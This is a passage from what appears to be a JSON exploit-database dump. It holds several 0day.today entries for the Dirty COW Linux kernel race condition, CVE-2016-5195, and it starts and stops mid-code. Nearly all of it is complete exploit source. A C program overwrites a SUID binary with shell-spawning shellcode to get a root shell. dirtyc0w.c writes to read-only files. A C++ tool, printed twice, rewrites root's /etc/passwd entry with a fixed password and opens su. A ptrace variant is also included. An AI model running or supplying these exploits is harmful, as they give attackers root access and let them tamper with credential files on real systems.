0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n\r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n\r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n\r\n fread(buf, sc_len, 1, fp);\r\n\r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n\r\n fclose(fp);\r\n sleep(1);\r\n }\r\n\r\n stop = 1;\r\n\r\n printf(\"Popping root shell.\\n\");\r\n printf(\"Don't forget to restore /tmp/bak\\n\");\r\n\r\n system(suid_binary);\r\n}\r\n\r\nint main(int argc,char *argv[]) {\r\n char *backup;\r\n\r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s to /tmp/bak\\n\", suid_binary);\r\n\r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n\r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n\r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n\r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n\r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n\r\n printf(\"Racing, this may take a while..\\n\");\r\n\r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n\r\n pthread_join(pth3, NULL);\r\n\r\n return 0;\r\n}\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/25943", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T19:17:02", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Linux Kernel Race Condition Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25944", "id": "1337DAY-ID-25944", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25944", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-01T03:11:30", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-30T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/pa", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-30T00:00:00", "href": "https://0day.today/exploit/description/26446", "id": "1337DAY-ID-26446", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n \r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n \r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n \r\nusing namespace std;\r\n \r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n \r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n \r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n \r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n \r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n \r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n \r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n \r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n \r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n \r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n \r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n \r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n \r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n \r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n \r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n \r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n \r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n \r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n \r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n \r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26446", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-17T21:28:04", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition PoC (Write Access) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26429", "id": "1337DAY-ID-26429", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth ,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26429"}, {"lastseen": "2018-01-11T05:08:17", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/pa", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26431", "id": "1337DAY-ID-26431", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n \r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n \r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n \r\nusing namespace std;\r\n \r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n \r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n \r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n \r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n \r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n \r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n \r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n \r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n \r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n \r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n \r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n \r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n \r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n \r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n \r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 